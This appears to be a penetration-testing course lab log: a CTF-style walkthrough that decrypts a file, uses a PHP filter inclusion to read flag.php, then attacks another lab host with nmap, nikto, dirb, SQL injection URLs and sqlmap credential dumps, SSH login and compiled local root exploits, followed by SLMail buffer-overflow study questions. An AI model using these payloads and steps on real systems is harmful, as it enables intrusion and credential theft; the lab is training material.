mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk

/mnt/217vm# ls

cd /media/bobsdisk/

ls

cat ToAlice.eml

file bobsdisk.dsk

mkdir /media/bobsdisk

mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk

/mnt/217vm# ls

cd /media/bobsdisk/

ls

cat ToAlice.eml

file ToAlice.csv.enc

file bobsdisk.dsk

pwd

mkdir /media/bobsdisk

mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk

ls

cd /media/bobsdisk/

ls

openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv

ls

cat ToAlice.eml | grep flag

openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv

ls

cat ToAlice.eml

    ***** look for supercalifragilisticoespialidoso ******

openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv

    supercalifragilisticoespialidoso

ls

cat ToAlice.csv

-----------------------------------------------------

Web Path,Reason

5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!

c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.

flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

-----------------------------------------------------

The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:

http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/

  -- view source

Found this string in the source:

R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr

ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl

bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi

YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK

ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56

YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg

TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l

IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh

ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl

IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK

------ https://www.base64decode.org/ -------

------ Decoded, but didn't find a flag -----

http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/

  -- view source --

  -- Nothing in source --

Browsed to the flag link:

view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag

  -- view source --

  -- Nothing in source --

Tried a PHP base64 decode with the URL:

http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php

http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php

http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php

------ https://www.base64decode.org/ -------

Use the string found here:

http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php

-------------------------------------------------------------------

PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==

-------------------------------------------------------------------

<?php

defined ('VIAINDEX') or die('Ooooh! So close..');

?>

<h1>Flag</h1>

<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>

<img src="trollface.png" />

<?php

// Ok, ok. Here's your flag!

//

// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}

//

// Well done, you're doing great so far!

// Next step. SHELL!

//

//

// Oh. That flag above? You're gonna need it...

?>

============================================ Attacking another server because I need a reverse shell =========================================

---------------------------------------------------------------------------------------------------------------------------------------------------------

Attack steps:

-------------

Step 1: Ping sweep the target network

-------------------------------------

---------------------------Type This-----------------------------------

nmap -sP 172.31.2.0/24

-----------------------------------------------------------------------

- Found 3 hosts

172.31.2.64

172.31.2.217

172.31.2.238

Step 2: Port scan target system

-------------------------------

---------------------------Type This-----------------------------------

nmap -sV 172.31.2.64

-----------------------------------------------------------------------

-------------Scan Results--------------------------------------------

PORT     STATE    SERVICE VERSION

22/tcp   open     ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)

80/tcp   open     http    Apache httpd 2.4.7 ((Ubuntu))

514/tcp  filtered shell

1037/tcp filtered ams

6667/tcp open     irc     ngircd

Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

--------------------------------------------------------------------

Step 3: Vulnerability Scan the webserver

----------------------------------------

---------------------------Type This-----------------------------------

cd ~/toolz/

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h 172.31.2.64

-----------------------------------------------------------------------

Step 4: Run dirbuster or similar directory bruteforce tool against the target

-----------------------------------------------------------------------------

---------------------------Type This-----------------------------------

wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl

perl Webr00t.pl -h 172.31.2.64 -v

-----------------------------------------------------------------------

                  or with dirbuster (dirb)

---------------------------Type This-----------------------------------

git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

dirb

./dirb http://172.31.2.64 wordlists/big.txt

-----------------------------------------------------------------------

Step 5: Browse the web site to look for clues

---------------------------------------------

Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself

..... really didn't get much from here so we just opened the web page in a browser

http://172.31.2.64/

.....browsed to the webpage and saw that it pointed to:

http://172.31.2.64/jabc

....clicked on documentation link and found hidden text that pointed to here:

http://172.31.2.64/jabcd0cs/

....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:

https://www.exploit-db.com/exploits/32075/

Tried the sql injection described in exploit-db:

http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9

http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9

Tried to run sqlmap against the target

---------------------------Type This-----------------------------------

cd sqlmap-dev/

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql

-----------------------------------------------------------------------

FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)

FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net

---------------------------Type This-----------------------------------

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql

-----------------------------------------------------------------------

    username:   webmin

    hash:       b78aae356709f8c31118ea613980954b

https://hashkiller.co.uk/md5-decrypter.aspx

    hash:       b78aae356709f8c31118ea613980954b

    pass:       webmin1980

ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.

---------------------------Type This-----------------------------------

ssh -l webmin 172.31.2.64

    webmin1980

id

cat /etc/*release

-----------------------------------------------------------------------

....tired of not having a real command shell...

---------------------------Type This-----------------------------------

python -c 'import pty;pty.spawn("/bin/bash")'

cd /tmp

pwd

cat >> exploit.c << out

**************paste in the content from here *****************

https://www.exploit-db.com/raw/39166/

------ hit enter a few times ------

------ then type 'out' ----- this closes the file handle...

---------------------------Type This-----------------------------------

gcc -o boom exploit.c

./boom

-----------------------------------------------------------------------

------------exploit failed, damn let's try another one ---------

---------------------------Type This-----------------------------------

cat >> exploit2.c << out

**************paste in the content from here *****************

https://www.exploit-db.com/raw/37292/

out

gcc -o boom2 exploit2.c

./boom2

id

......YEAH - do the happy dance!!!!

=============================================== Now back to the previous server ==============================================================

                            #######################################

----------- ############### # Day 3: Intro to Exploit Development  ################ -----------

                            #######################################

The first exploit

https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip

SLMail Scripts Questions

SLmail1.py

How do you start SLMail?     

What do you have to be careful of when attaching your debugger to the application?

How many As are you sending to the application?

SLmail2.py

What tool(s) can be used to generate a cyclic pattern?

What port are we attacking?

What verb are we attacking?

SLmail3.py

What is the value contained in EIP?

What is the portion of the cyclic pattern that we must search for?

What is the distance to EIP?

SLmail4.py

What do you overwrite EIP with in this script?

What is the length of your shellcode in this script?

What is the difference between SOCK_STREAM and SOCK_DGRAM?

SLmail5.py

What is struct.pack and why are we using it?

What where is our JMP ESP coming from?

What is the length of our shellcode in this script?

SLmail6.py

Why do you subtract the top of ESP from the bottom of ESP in this script?

What is the length of our shellcode in this script?

What is the distance to EIP in this script?

SLmail7.py

How do you test for bad characters?

What are the bad characters in this script?

What is the address of the JMP ESP in this script and what DLL does it come from?

SLmail8.py

What is DEP and how do you disable it?

What is the purpose of the stack adjustment?

What is the purpose of the NOP sled?

If you got through SLMail comfortably - then try the script below.

https://s3.amazonaws.com/infosecaddictsfiles/ff.zip